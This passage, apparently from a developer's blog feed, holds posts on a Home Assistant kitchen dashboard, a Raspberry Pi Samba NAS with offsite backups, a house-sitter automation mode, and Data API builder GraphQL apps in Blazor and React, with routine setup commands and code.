But it might also return us “the moon”, or “the fence”, or “the lazy dog jumps over the moon”, or “the lazy dog jumps over the fence”, or “the lazy dog jumps over the moon and the fence”, or so on.\nFun fact: I used a completion for that last sentence, so that’s an example of the AI in action!\nObviously this is a huge oversimplification of what this is, but it’s enough to ground our understanding, and we’ll build on that throughout the series.\nOpenAI and Azure OpenAI Service Before I wrap up this post I want to mention a bit about OpenAI and Azure OpenAI Service. It might seem a bit confusing that I refer to the two of them interchangeably, but that’s because they have an overlap, AOAI (isn’t that a fun acronym!) builds on top of OpenAI, providing the same Large Language Models, or LLMs that OpenAI provides, but with the added benefit of being able to run it in Azure, and in doing so bring in enterprise-centric features that you’d expect from security to integration with other data sources to content filtering.\nBut when it comes to working with them from a SDK level, they operate very similar. In fact, the .NET SDK that we’ll be using has the ability to change between pointing to AOAI or OpenAI when establishing the connection, so you can easily switch between the two.\nBut more on that next time.\nNext Time That will do us for this post, mostly this post was about introducing the new series and setting the scene for what we’ll be looking at.\nIn the next post we’ll look at the basics of how we can use the SDK to connect to the service, and how we can use it to generate completions.\n", "id": "2023-09-01-generative-ai-and-dotnet---part-1-intro" }, { "title": "Building a Smart Home - Part 13 Wall Mounted Dashboards", "url": "https://www.aaron-powell.com/posts/2023-08-19-building-a-smart-home---part-13-wall-mounted-dashboards/", "date": "Fri, 18 Aug 2023 23:05:18 +0000", "tags": [ "HomeAssistant", "smart-home" ], "description": "Let's take our smart home to the next level with a wall mounted dashboard!", "content": "\nI finally took the plunge and did the thing I’d been wanting to do for a while now. I built a wall mounted, well fridge mounted, dashboard for my smart home. I’ve been wanting to do this for a while now, but I’ve been putting it off because I didn’t want to spend the money on a tablet.\nAfter all, I looked at this problem just the same as I look at any other addition to the smart home, experiment first, then buy. So, what did I have around that I could use? Well, I have a few old Surface Pro devices laying around and I figured that a Surface Pro 4 would be a good candidate for this experiment. I mean, it’s a tablet, it’s got a screen, a battery, what more do I need!\nThere’s plenty of videos out there on how to do a dashboard, but every one that I’ve seen is using an Android tablet of some variety and here I am with a Windows device, so I figured I’d document my journey.\nThe Software There are three different approaches I explored for running Home Assistant as a dashboard, the simplest option is to just run Edge full screen and calling it a day. The next option is to install the website as a PWA, but that’s a bit annoying because I don’t have an SSL certificate for my local Home Assistant instance, so it shows a “not secure” banner across the top of the screen (and since it’s running locally I want to use the local address rather than my Nabu Casa endpoint). 
The final option is to install the Home Assistant app from the Android store using Windows Subsystem for Android, aka WSA.\nWSA is an interesting idea, I think it might be the best option, but for the moment I'm just running the browser in full screen mode and it's going well enough - although I have had a few instances where the browser hasn't refreshed, so I've had to manually refresh the page.\nHASS.Agent The other core piece of software I'm using is HASS.Agent, which is a "service" that you run to provide a local API for interacting with Home Assistant, and to feed sensor data back from the device. It can also be used to run commands on the device, exposing these commands as buttons or similar HA entities.\nWe'll come back to HASS.Agent later in the post 😉.\nConfiguring a user account Here's an interesting conundrum: unlike using something like an iPad or Android tablet, Windows is really designed to be a multi-user operating system. So, how do we configure a user account for our dashboard? Well, I'm glad you asked!\nMy first thought was to use Windows Kiosk Mode. This really seems like the perfect solution, it's designed for exactly this use case, but there was a problem: it can only run a fairly restricted style of app, and while it would run Edge, it seemed that it would lose the authenticated session to HA - which is not really ideal as you don't want to be putting in credentials all the time.\nThe other problem that I hit with Kiosk Mode is that I couldn't get it to run HASS.Agent, which I kind of need.\nSince it's a Windows 11 device, it really wants me to use a Microsoft account, but that's not ideal - I don't really want to setup another Microsoft account, nor do I want my account to be logged in for anyone to use! So, I created a local account with minimal permissions and I disabled the need for it to have a password or PIN on login, as it's not like you want to be putting in a PIN constantly.\nSo I configured HASS.Agent to start on boot, logged into Home Assistant in Edge and it's ready to go.\nDashboard on, dashboard off I know that screen burn-in isn't really a thing like it was in the past, but that doesn't mean that I want the screen on 24/7; at the very least, it's not really a great use of energy. So how are we going to manage this?\nThe built-in way Conveniently, HASS.Agent has commands as a feature, which allows you to create a button/switch/etc. in HA that will do something on your device. There's a bunch of built in ones, such as to turn the screen on and off. Success!\nWell, it would have been, but it wasn't. While I'm not really sure what the underlying Windows issue is, what I have observed is that the way HASS.Agent performs the wake-up is by issuing a SendKey command (specifically using this API) that presses KEY_UP according to the source code. The problem is that when you sleep the screen with the built-in Monitor Sleep command the Surface Pro doesn't respond to SendKey commands.\nI tried a bunch of different ways to diagnose this, including observing what the Windows Event Viewer reports at a system level on the sleep operation, but there was nothing that indicated what was wrong.\nBut there is another way in which a Windows device can sleep the screen, and that's when you have a screen idle timeout after the duration set in the Power Management.\nWhat I observed with this is that when the screen turns off due to an idle timeout you can issue a SendKey command and wake the screen up. 
I did some more testing against Event Viewer to see if I could see what was different between idle timeout and sending the WM_SYSCOMMAND and I could not find anything different other than the message indicating that the screen was turned off because of idle timeout vs WM_SYSCOMMAND… so 🤷.\nThis means we’re going to need to find a different solution to managing the screen turning off.\nThe hacky way With all this knowledge we can look at a hacky solution, hack the power config settings! These settings allow you to control when the device will turn off the screen (and turn itself off) when on battery or AC power.\nWhile you’d normally do this via the Settings UI, you can also use the powercfg command line too, which means we can make a custom command in HASS.Agent to execute that. I created two commands, one that will disable the idle timeout completely and one that sets a short idle timeout:\nDisable timeout: powercfg /change monitor-sleep-ac 0 Enable timeout: powercfg /change monitor-sleep-ac 1 With these commands we’re changing monitor-sleep-ac, the idle timeout of the monitor when plugged in (which it always will be). When it’s set to 0 then it won’t timeout, otherwise it’ll timeout after 1 minute.\nAdding an automation Now that we’ve figured out how we can turn the screen on and off, it’s time to make an automation that uses these. I have an occupancy sensor in the kitchen where the dashboard is to be mounted, so I’m going to have it turn the screen on if occupancy is detected with the MonitorWake command in HASS.Agent and then disable the idle timeout, and when occupancy has been cleared for 5 minutes, enable the 1 minute timeout.\nHere’s the YAML for the two automations:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 alias: "Kitchen Dashboard: Enable sleep" description: "" trigger: - platform: state entity_id: - binary_sensor.occupancy_living_room from: "on" to: "off" for: hours: 0 minutes: 5 seconds: 0 condition: - condition: state entity_id: input_boolean.kitchen_dashboard_sleep_enabled state: "on" action: - service: button.press data: {} target: entity_id: button.kitchendashboard_enablesleep - service: input_boolean.turn_off data: {} target: entity_id: input_boolean.kitchen_dashboard_sleep_enabled mode: single alias: "Kitchen Dashboard: Wake up" description: "" trigger: - platform: state entity_id: - binary_sensor.occupancy_living_room from: "off" to: "on" condition: - condition: state entity_id: input_boolean.kitchen_dashboard_sleep_enabled state: "off" action: - service: button.press data: {} target: entity_id: button.kitchendashboard_disablesleep - service: input_boolean.turn_on data: {} target: entity_id: input_boolean.kitchen_dashboard_sleep_enabled - service: button.press data: {} target: entity_id: button.kitchendashboard_monitorwake_localuser mode: single I’ve also put in there an input_boolean helper to track if the sleep is enabled/disabled on the device, as this means that we can avoid running the wake up automation if the screen didn’t turn off - basically when occupancy was cleared but hadn’t been cleared for long enough to trigger the “enable sleep” automation.\nNow as you enter the area the screen will turn on and sleep is disabled, then when you leave the area for 5 minutes the screen will enter the idle mode.\nMounting Because of the layout of our kitchen I don’t really have any wall space to mount the tablet in a convenient location (the space I would use has 
two pin boards for the kids' artwork, school notices, etc.), so instead I mounted it on the fridge:\nOn the back of the device I have two 3M velcro picture hanging strips, each rated to like 3kg, which is probably overkill, but better safe than sorry! The reason I went with these strips is so that I can easily remove the device if I need to attach a keyboard and do anything with it. I was considering getting some heavy-duty magnets instead and fixing them to the back, but this was a nice, cheap initial solution.\nThe power cable snakes from the side of the fridge, and since it's on the right door of our fridge the cable only just pops out, which works well enough.\nI did mount it in just the right location so that when the door of the fridge is opened it won't hit the wall of the fridge nook… just. But you know what they say, measure once, cut twice (or something like that…).\nConclusion All in all, I'm pretty happy with how this has turned out and my wife doesn't hate it, so, win, and it was a good way to utilise some existing hardware that I had rather than going out and purchasing a new tablet just for this.\nThe Surface Pro 4 is just about the right size for our fridge; it takes up the space well without looking either too big or too small, but I can imagine that if it was on a wall it might look more out of place, so if I do ever get to the point of being able to wall mount something, I'd possibly look at a different device.\nHASS.Agent is a nifty little addition and I like how well it works for what I need in controlling the device. I have some other sensors that I've exposed about the state of the Surface Pro, such as whether it's charging or not, and I'm contemplating using a smart plug to control the battery charge/discharge rather than having it constantly charging, but I know that the battery of this one is not great at the moment, so I feel like it'd probably find itself going flat pretty quickly and the plug would flip-flop a lot.\nOne thing I do wish is that this was running on ethernet rather than wifi, as then I could use Wake on LAN, allowing the device to actually sleep (and thus better handle power management), but I don't have a convenient ethernet port, plus it would look rather ugly. I explored using WoL with wifi but it doesn't seem to work.\nIn my next post I'll talk about the dashboard itself and what I'm doing to make something that's better designed for the location, rather than the one I use on my phone.\n", "id": "2023-08-19-building-a-smart-home---part-13-wall-mounted-dashboards" }, { "title": "Building a Smart Home - Part 12 NAS and Backups", "url": "https://www.aaron-powell.com/posts/2023-06-22-building-a-smart-home---part-12-nas-and-backups/", "date": "Thu, 22 Jun 2023 02:01:19 +0000", "tags": [ "HomeAssistant", "smart-home" ], "description": "Let's setup a NAS and backups for our smart home.", "content": "It's just over 12 months since we moved into our house and I started properly running Home Assistant and designing our smart home. In that time I've been lucky that nothing has really "gone wrong", sure, there's been the odd bug here and there (see my last post on debugging tips), but the system hasn't "died". But before we moved into this house I was experimenting with Home Assistant and wasn't so lucky - the SD card running it died and I lost everything. 
I don’t want that to happen again, so I’m going to do something I’ve been putting off for a while - setup a NAS and backups.\nNAS A NAS, or Network Attached Storage, is a remote storage device that you can access over your network. It’s basically a hard drive that you can access from any device on your network. I’m going to use it to store backups of my Home Assistant instance, but also to store other files like photos and videos.\nMany people I know have a Synology NAS, and while I’m sure they are great I don’t really need much from my NAS, either in features or storage, after all, anything that is important that I’m storing is in OneDrive already, so I don’t see why I need something local with large amounts of storage. Also, neither my wife or I are really into photography, so we don’t have huge images to store, and we don’t have a huge movie collection either, that’s what streaming services are for.\nSo I decided to repurpose an old 1TB external HDD that has been sitting in a cupboard for a few years and turn it into a poor excuse for a NAS… but given it’s just a USB drive I’ll need something to connect it to that is always powered on, and for that I’ll use the Raspberry Pi that is running Pi Hole.\nWhy am I not using the one running Home Assistant? Well firstly, that wouldn’t be a NAS would it, but more importantly, I’m running HAOS and I don’t want to mess around at the OS level and risk blocking upgrades. Besides, the PiHole doesn’t do a whole lot, so it can pick up the slack.\nSetting up the NAS I’m going to use Samba to share the drive over the network, since it’s the easiest way to expose it for integration into Home Assistant (and to the Windows and Mac devices on our network).\nFirst step was the mount the USB drive in the Pi, and to do that I needed to know where the disk was to mount, which you can find with lsblk:\naaron@raspberrypi:/media $ lsblk NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT sda 8:0 1 28.7G 0 disk ├─sda1 8:1 1 256M 0 part /boot └─sda2 8:2 1 28.4G 0 part / sdb 8:16 0 931.5G 0 disk └─sdb1 8:17 0 931.5G 0 part We can see that the drive is /dev/sdb1, so it can be mounted with:\n1 sudo mount /dev/sdb1 /media/usb Next we’re going to need to ensure Samba is installed on the Pi:\n1 2 3 sudo apt update && \\ sudo apt upgrade && \\ sudo apt install samba samba-common-bin And then configure it by editing /etc/samba/smb.conf:\n[external-1] comment = 1TB External Disk path = /media/usb browsable = yes guest ok = no read only = no create mask = 0755 directory mask = 0755 write list = aaron I’ve locked down the share to require authentication, and only allow my user to write to it, so then we need to create a user for Samba:\n1 sudo smbpasswd -a aaron And finally restart the Samba service:\n1 sudo systemctl restart smbd With that, our Samba server is up and running and we have a poor excuse for a NAS!\nHandling file system permissions This was something I didn’t take into consideration, and may not be a problem for you, but since the drive was formatted on a Windows machine it was a FAT32 file system, and this posed a problem when trying to write to it via Samba - it was owned by root on the Pi, since they mounted it, and because FAT32 doesn’t support file system permissions, I couldn’t change the ownership of the files on the drive.\nTo solve this it was a matter of formatting the drive to ext4:\n1 2 3 4 sudo umount /media/usb \\ sudo mkfs.ext4 /dev/sdb1 \\ sudo mount /dev/sdb1 /media/usb \\ sudo chown -R aaron:aaron /media/usb Now the drive was mounted with the correct 
permissions, and I could write to it via Samba.\nIntegrating with Home Assistant In the Home Assistant 2023.6 release they added better support for network storage, meaning you can connect to a NAS via Samba or NFS natively, rather than via an add-on as previously required.\nThe other advantage of this is that when you attach the storage to Home Assistant you can select what the storage will be used for, with one such option being backups, which integrates natively with Home Assistant's backup system.\nSince I might want to use the storage for other stuff in the future, I've made a folder on the drive called ha-backups and specified that subpath in the storage connection.\nFrom the Backups section of Home Assistant you can change the default location for backups to be the new network storage:\nOffsite backups Having a NAS is great, but if it's in the same physical location as your Home Assistant instance, and that location burns down, you're still going to lose everything. Now while I'm not planning for that to happen, I've been in tech long enough to plan for the worst case scenario, so I'm going to setup offsite backups.\nIf you're using a Synology or other proper NAS solution, you probably have some integrated way to ship those backups to a remote location, but we're not that fancy, we've created a poor excuse for a NAS, so we're going to need to do this ourselves.\nThankfully there are Home Assistant add-ons that can help us: Google Drive Backup or a OneDrive version. I'm going to use the Google Drive version, since I already have a Google account that is dedicated to smart home stuff (and isolated from my personal Google account) and while my primary storage location for stuff is OneDrive, I want to keep things separated.\nThe add-on is pretty simple to setup and the instructions are pretty clear, so I won't go into detail here, but once it's setup you can configure it to run on a schedule, and it will automatically upload your backups to Google Drive. For me, I'm going to run it every night at 11.30pm and keep 20 days' worth of backups, as my full backup size is about 550MB and there's 15GB of storage available on the Google account, so a rolling 20 days gives me plenty of runway to restore from a backup if I need to.\nNote: It lists 9 backups that are ignored; those backups are stored locally on the Pi that Home Assistant runs on and aren't uploaded to Google Drive.\nConclusion This is something that I've been putting off for a while now. 
I’d played with the previous add-ons for working with Samba but always struggled with them, so I’m glad that Home Assistant has added native support for network storage, and that it’s so easy to configure, and that combining it with the Google Drive Backup add-on was easy and now I have a proper backup strategy in place… although I should probably test it at some point to make sure it actually restores… 😅\nAll in all, I probably spent about 30 minutes getting this all setup, but it took me a few days because I kept forgetting that it’s umount not unmount to unmount a disk in Linux, and then fighting with file system permissions, before realising I should just use ext4.\nShout out to Everything Smart Home for a great guide on getting everything setup and to Lars for another look at how to do it leveraging NodeRED.\n", "id": "2023-06-22-building-a-smart-home---part-12-nas-and-backups" }, { "title": "Building a Smart Home - Part 11 House Sitter Mode", "url": "https://www.aaron-powell.com/posts/2023-04-27-building-a-smart-home---part-11-house-sitter-mode/", "date": "Thu, 27 Apr 2023 00:11:23 +0000", "tags": [ "HomeAssistant", "smart-home" ], "description": "It's time to go on a holiday, but what about your smart home?", "content": "When designing a smart home I’ve reiterated many times that the goal was to make it work regardless of who was there and that existing expectations of how things like switches work are maintained.\nBut naturally as you start to evolve the smart home more you will end up doing customisations around your household routines. In our house we have a few, one example is the night time routine for the kids bedrooms - at a scheduled time their light will come on, then when they flip the switch to turn it off it will also turn on their night light (there’s a few nuances to it though).\nThis kind of thing works for us and our kids, but it might not work for others, and it was something we had to tackle recently when we went on holidays and had a house sitter.\nEntre House Sitter Mode The astute reader might have noticed when I talked about smart door locks that I have a generic automation that will enable/disable a PIN for any user one of those users was called house_sitter. 
This is combined with a script that I have to generate a new four-digit PIN for that user.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 generate_front_door_pin: alias: Generate a random PIN description: Generate a random PIN for a specific User fields: user: description: The entity_id which the User's PIN is stored in example: input_text.lock_house_sitter_pin sequence: - alias: Randomise PIN service: input_text.set_value target: entity_id: "{{ pin_entity_id }}" data: value: "{% for n in range(4) -%}\\n {{ [0,1,2,3,4,5,6,7,8,9]|random }}\\n{%- endfor %}\\n" I have this called from another script:\n1 2 3 4 5 6 7 8 setup_front_door_house_sitter_pin: alias: Setup front door house sitter PIN description: Create a new house_sitter PIN and enable it sequence: - alias: Randomise PIN service: script.generate_front_door_pin data: pin_entity_id: input_text.lock_house_sitter_pin To use these I have added a input_boolean to indicate if we want to enable or disable the house sitter mode:\n1 2 3 4 input_boolean: house_sitter_mode: name: House Sitter Mode icon: mdi:home-account And then we have an automation that listens for the changes to its state:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 - id: "security_toggle_house_sitter_lock_access" alias: "Security: Toggle House Sitter lock access" description: "" trigger: - platform: state entity_id: - input_boolean.house_sitter_mode condition: [] action: - if: - condition: state entity_id: input_boolean.house_sitter_mode state: "on" then: - service: script.setup_front_door_house_sitter_pin data: {} else: - service: script.clear_front_door_house_sitter_pin data: {} mode: single Great, now we have a way to know within Home Assistant if we are in house sitter mode or not, and with that we can adjust our automations.\nTweaking the automations There are two approaches that I’ve tackled for this problem space and I’ll cover both of them here. The first is that we can add a condition to our automations to check if we are in house sitter mode or not, and either let the automation run or not.\nI initially went down this route for automations but I ultimately found that it wasn’t scalable, you would have a lot of automations that you add this condition to, and if you add more conditions to the automation you have to be careful that they don’t conflict with each other.\nInstead, I went down the route of creating an automation that would run when the input_boolean is triggered and then it would enable/disable the automations that I wanted to change. 
The idea is that you disable the automations that are unique for how your household operates, and then enable the automations that are generic and work for anyone.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 alias: "System: House sitter automation management" description: "" trigger: - platform: state entity_id: - input_boolean.home_mode_house_sitter from: "off" to: "on" - platform: state entity_id: - input_boolean.home_mode_house_sitter from: "on" to: "off" condition: [] action: - service: automation.{{ family_action }} target: entity_id: - automation.bedtime_lights_out - automation.climate_aaron_s_office - automation.climate_aaron_s_office_off - automation.lighting_kids_fan_light_switch_toggle - automation.lighting_toggle_on_switch_change - automation.system_wol_aaron_s_pc - service: automation.{{ house_sitter_action }} target: entity_id: - automation.lighting_parents_fan_house_sitter_mode - automation.lighting_parents_downlights_house_sitter - automation.security_house_sitter_arrived mode: single variables: family_action: "{{ 'turn_off' if trigger.to_state.state == 'on' else 'turn_on' }}" house_sitter_action: "{{ 'turn_on' if trigger.to_state.state == 'on' else 'turn_off' }}" The automation will look at the state of the input_boolean and generate two variables using a template to work out which service we need to call, turn_on or turn_off, and then it will call the service for the family and house sitter automations.\nI find that this approach, enable/disable automations rather than conditions, a much better option for me, as it’s easy to add more automations to the list and it’s clear when looking at the automation list in Home Assistant what is enabled and what isn’t (and that makes debugging easier!).\nConclusion This is a simple approach to managing the automations that you want to enable/disable when you are in house sitter mode, and it’s one that I’ve found works well for me. I’m sure there are other approaches that you could take, and I’d love to hear about them if you have any.\n", "id": "2023-04-27-building-a-smart-home---part-11-house-sitter-mode" }, { "title": "GraphQL on Azure: Part 14 - Using Data API builder with SWA and Blazor", "url": "https://www.aaron-powell.com/posts/2023-03-16-graphql-on-azure-part-14-using-dab-with-swa-and-blazor/", "date": "Wed, 15 Mar 2023 16:02:47 +0000", "tags": [ "azure", "graphql", "dotnet" ], "description": "We've seen how we can use DAB with SWA and React, now let's look at how we can use it with SWA and Blazor", "content": "This is the last in the three part sub-series looking at the newly launched Data API builder for Azure Databases (DAB) and while last time we looked at creating a React application, this time I wanted to look at how to do the same thing but in .NET using Blazor. So let’s jump in and learn about how to use SWA Data Connections with Blazor.\nOh, and for something different, let’s try also use a SQL backend rather than Cosmos DB.\nSetting up DAB When we’ve looked at DAB so far, we’ve had to create two files, a config for DAB and a GraphQL schema containing the types. 
Well since we’re using SQL this time we can drop the GraphQL schema file, as DAB will use the SQL schema to generate the types, something it couldn’t do from Cosmos DB, as it doesn’t have a schema.\nWe’ll use the same data structure, which we have a JSON file like so:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 [ { "id": "0", "category": "Science: Computers", "type": "multiple", "difficulty": "easy", "question": "What does CPU stand for?", "correct_answer": "Central Processing Unit", "incorrect_answers": [ "Central Process Unit", "Computer Personal Unit", "Central Processor Unit" ], "modelType": "Question" } ] Let’s create a SQL table for that:\n1 2 3 4 5 6 7 USE trivia; CREATE TABLE question( id int IDENTITY(5001, 1) PRIMARY KEY, question varchar(max) NOT NULL, correct_answer varchar(max) NOT NULL, incorrect_answers varchar(max) NOT NULL CHECK ( isjson(incorrect_answers) = 1 ) ); For the incorrect_answers column, we’re specifying that it’s a JSON column, since it’d make the most sense to store it that way rather than creating another table to relate to or similar.\nNote: At the time of writing there is a bug in DAB and how it handles JSON columns - we’re going to have to deserialize it ourself: https://github.com/Azure/data-api-builder/issues/444\nThe only other things we need to change for our config file is the data-sources, so it knows we’re using mssql as the backend over Cosmos DB ()\n1 2 3 4 "data-source": { "connection-string": "<put something here>", "database-type": "mssql" } Note: The sample repo contains a VSCode devcontainer which will setup a MSSQL environment. You can connect with the local connection string: Server=sql,1433;Database=trivia;User Id=sa;Password=YourStrongPassword!;Persist Security Info=False;MultipleActiveResultSets=False;Connection Timeout=5;TrustServerCertificate=true;\nWe also need to update the source property of the Question entity to have the schema.table format that SQL uses:\n1 "source": "dbo.question", With our backend ready it’s time to focus on the frontend.\nBlazor and GraphQL When it comes to creating a GraphQL client in .NET there’s really no other choice of library to use than Strawberry Shake from Chilli Cream.\nLet’s start by creating a new Blazor WebAssembly project:\n1 dotnet new blazorwasm --name BlazorGraphQLTrivia --output frontend We’ll also need to add the Strawberry Shake NuGet package:\n1 2 3 dotnet new tool-manifest dotnet tool install StrawberryShake.Tools dotnet add frontend package StrawberryShake.Blazor The next step is going to be to generate the .NET types and associated files from our GraphQL service, but since that service is part of the local environment, we’ll need to set it up. To do that we’ll run the swa init command and generate a SWA CLI config like so:\n1 2 3 4 5 6 7 8 9 10 11 12 13 { "$schema": "https://aka.ms/azure/static-web-apps-cli/schema", "configurations": { "frontend": { "appLocation": "frontend", "outputLocation": "build", "appBuildCommand": "dotnet build", "run": "dotnet watch", "appDevserverUrl": "http://localhost:5116", "dataApiLocation": "data" } } } Then we can run the server with swa start. Now our GraphQL endpoint (and Blazor application) are up and running. You can check out the schema with Banana Cake Pop by having it navigate to http://localhost:4280/data-api/graphql. Something worth noticing is the type for Question that was generated:\n1 2 3 4 5 6 type Question { id: Int! question: String! correct_answer: String! incorrect_answers: String! 
} The id field is an Int!, since that matches the underlying data type in the SQL schema, and incorrect_answers is a String! since it doesn’t know the structure of the JSON column to map a GraphQL object type.\nWith the server now running, we can get Strawberry Shake to generate the .NET stuff it needs:\n1 dotnet graphql init http://localhost:4280/data-api/graphql -n TriviaClient -p ./frontend This command will add three new files to your project, a .graphqlrc.json file that contains the information for Strawberry Shake on how to connect to your GraphQL endpoint and generate types, the GraphQL schema as schema.graphql and a schema.extensions.graphql file which Strawberry Shake uses to do things such as working with custom scalars.\nNow that we have the GraphQL client generated, we can add a GraphQL operation to our application. We’ll start by adding a new page to our application, file called GetQuestions.graphql:\n1 2 3 4 5 6 7 8 9 10 query getQuestions { questions(first: 10) { items { id question correct_answer incorrect_answers } } } With a dotnet build run and passing, we can go and add the TriviaClient to the Pages/Index.razor file and query our GraphQL server. Let’s start with an @code block:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 @code { record QuestionModel(int Id, string Question, IEnumerable<string> Answers, string CorrectAnswer); private IEnumerable<QuestionModel> questions = new List<QuestionModel>(); private Dictionary<int, string> playerAnswers = new(); private string message = string.Empty; protected override async Task OnInitializedAsync() { var result = await TriviaClient.GetQuestions.ExecuteAsync(); if (result is null || result.Data is null) { return; } questions = result.Data.Questions.Items.Select(q => { var incorrectAnswers = JsonSerializer.Deserialize<List<string>>(q.Incorrect_answers); return new QuestionModel(q.Id, q.Question, Randomise(incorrectAnswers.Append(q.Correct_answer)), q.Correct_answer); }).ToList(); } public static IEnumerable<string> Randomise(IEnumerable<string> list) { var random = new Random(); return list.OrderBy(x => random.Next()).ToList(); } public void CheckAnswers() { var correctCount = 0; foreach ((int questionId, string answer) in playerAnswers) { var question = questions.First(q => q.Id == questionId); if (question.CorrectAnswer == answer) { correctCount++; } } message = $"You got {correctCount} of {questions.Count()} correct!"; } } That’s a lot of code, so let’s break it down. First we define a record type that we’ll “properly” deserialize the type into (basically unpack the JSON array for incorrect_answers) and declare some private fields to store data we need for the page. 
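To make that record and the JSON unpacking a little more concrete before diving into the component, here's a minimal standalone sketch. It uses System.Text.Json and sample values borrowed from the trivia data earlier in the post, so it's an illustration of the idea rather than code lifted from the actual sample:

```csharp
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text.Json;

// incorrect_answers comes back from DAB as a raw JSON string (see the note on the
// JSON column bug above), so we deserialize it ourselves...
string incorrectAnswersJson = "[\"Central Process Unit\",\"Computer Personal Unit\",\"Central Processor Unit\"]";
List<string> incorrectAnswers = JsonSerializer.Deserialize<List<string>>(incorrectAnswersJson) ?? new();

// ...and fold the correct answer back in so the page only ever deals with one list.
QuestionModel sample = new(
    5001,
    "What does CPU stand for?",
    incorrectAnswers.Append("Central Processing Unit"),
    "Central Processing Unit");

Console.WriteLine(string.Join(", ", sample.Answers));

// The shape the UI binds to: a single Answers list rather than separate
// correct_answer / incorrect_answers fields.
record QuestionModel(int Id, string Question, IEnumerable<string> Answers, string CorrectAnswer);
```

In the component itself this unpacking happens inside the Select over the query results, as we'll see now.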
The real bulk of our integration starts in the OnInitializedAsync method:\n1 2 3 4 5 6 7 8 9 10 11 12 13 protected override async Task OnInitializedAsync() { var result = await TriviaClient.GetQuestions.ExecuteAsync(); if (result is null || result.Data is null) { return; } questions = result.Data.Questions.Items.Select(q => { var incorrectAnswers = JsonSerializer.Deserialize<List<string>>(q.Incorrect_answers); return new QuestionModel(q.Id, q.Question, Randomise(incorrectAnswers.Append(q.Correct_answer)), q.Correct_answer); }).ToList(); } Here we use the TriviaClient (which we can inject into the component with @inject TriviaClient TriviaClient at the top of the file) to call the GetQuestions method, which uses the operation we defined above to query the GraphQL server.\nOnce we get a result back it's unpacked and turned into the QuestionModel that can be bound to the UI.\nAnd I'll leave the rest of the exercise, displaying the questions and answers, up to you, but here's how it looks in the sample application.\nConclusion In this post we've looked at how to use Database Connections with SWA and Blazor to create a trivia game. We've seen how to use Database Connections to create a GraphQL endpoint over our SQL server, and how to consume it in a Blazor application via the Strawberry Shake NuGet package.\nYou'll find the sample application on my GitHub and you can learn more about how to use Database Connections on SWA through our docs.\n", "id": "2023-03-16-graphql-on-azure-part-14-using-dab-with-swa-and-blazor" }, { "title": "GraphQL on Azure: Part 13 - Using Data API builder with SWA and React", "url": "https://www.aaron-powell.com/posts/2023-03-16-graphql-on-azure-part-13-using-dab-with-swa-and-react/", "date": "Wed, 15 Mar 2023 16:01:47 +0000", "tags": [ "azure", "graphql", "javascript", "serverless" ], "description": "Want to easily create a GraphQL API for your Azure Database? Well, let's see how easy it is with SWA Database Connections.", "content": "In the last post I introduced you to a new project we've been working on, Data API builder for Azure Databases (DAB), and in this post I want to look at how we can use it in Azure through one of my favourite Azure services, Azure Static Web Apps. You see, as part of today's DAB announcement, we've announced that it is available as a feature of SWA (called Database Connections), so let's build a React app!\nLocal Development One of the neat things about working with SWA is that we have a CLI tool which emulates the functionality of SWA, and with today's announcement, we can use it to emulate the Database Connections feature, so let's get started. First off, we need to ensure we have the latest version of the CLI installed, so let's run the following command:\n1 npm install -g @azure/static-web-apps-cli@latest For the Database Connections, we'll use the same configuration that we had in the last post, so let's copy the dab-config.json and schema.graphql into the data folder of our repo, and rename the dab-config.json to staticwebapp.database.config.json. Next, I'm going to scaffold out a new React app (using Vite), so let's run the following command:\n1 npx create-vite frontend --template react-ts Lastly, we'll initialise the SWA CLI:\n1 swa init Follow the prompts and adjust any of the values you require (the default Vite template uses npm run dev for the dev server but the SWA CLI init will want to use npm start, so you'll need to adjust one of those values). 
When completed, you should have a swa-cli.config.json like this:\n1 2 3 4 5 6 7 8 9 10 11 12 13 { "$schema": "https://aka.ms/azure/static-web-apps-cli/schema", "configurations": { "dab": { "appLocation": "frontend", "outputLocation": "build", "appBuildCommand": "npm run build", "run": "npm run dev", "appDevserverUrl": "http://localhost:5173", "dataApiLocation": "data" } } } Notice the last line, "dataApiLocation": "data", this is the location of the folder that contains the schema.graphql and staticwebapp.database.config.json files which are going to be used by the Database Connections feature. Now, let’s start the SWA CLI:\n1 swa start Once the CLI has started you can browse the GraphQL schema in your choice of IDE by providing it with the address http://localhost:4280/data-api/graphql.\nBuilding a React application It’s time to build the React application, I won’t cover all the details (you’ll find the full example on my GitHub), instead I’ll focus on the GraphQL integration.\nSince we have a TypeScript application, we can adapt the pattern I discussed in part 5 on type-safe GraphQL, using GraphQL Code Generator to generate the types for us. To do this, we’ll need to install the following packages to the frontend project:\n1 npm install -D @graphql-codegen/cli We’ll then initialise the GraphQL Code Generator:\n1 npx graphql-code-generator init Follow the setup guide to create the config file like so:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 import type { CodegenConfig } from "@graphql-codegen/cli"; const config: CodegenConfig = { overwrite: true, schema: "http://localhost:4280/data-api/graphql", documents: ["src/**/*.tsx", "src/**/*.ts"], generates: { "src/gql/": { preset: "client", plugins: [], }, }, }; export default config; Great, we’re almost ready to go, the last thing we’re going to need is a GraphQL client, and for that, we’ll use Apollo Client, so let’s install that:\n1 npm install @apollo/client graphql Integrating GraphQL It’s time to integrate GraphQL into our application, and I’m going to do that by creating a useQuestions hook, which will return the questions from the database. First, let’s create the hook:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 import { graphql } from "./gql/gql"; import { useQuery } from "@apollo/client"; import { useEffect, useState } from "react"; const getQuestionsDocument = graphql(/* GraphQL */ ` query getQuestions { questions(first: 10) { items { id question correct_answer incorrect_answers } } } `); This might error at the moment as the graphql function doesn’t exist, which is to be expected as we haven’t generated it yet via the GraphQL Code Generator. Let’s do that now:\n1 npm run codegen This assumes that the codegen script is in the package.json file, if not, you’ll need 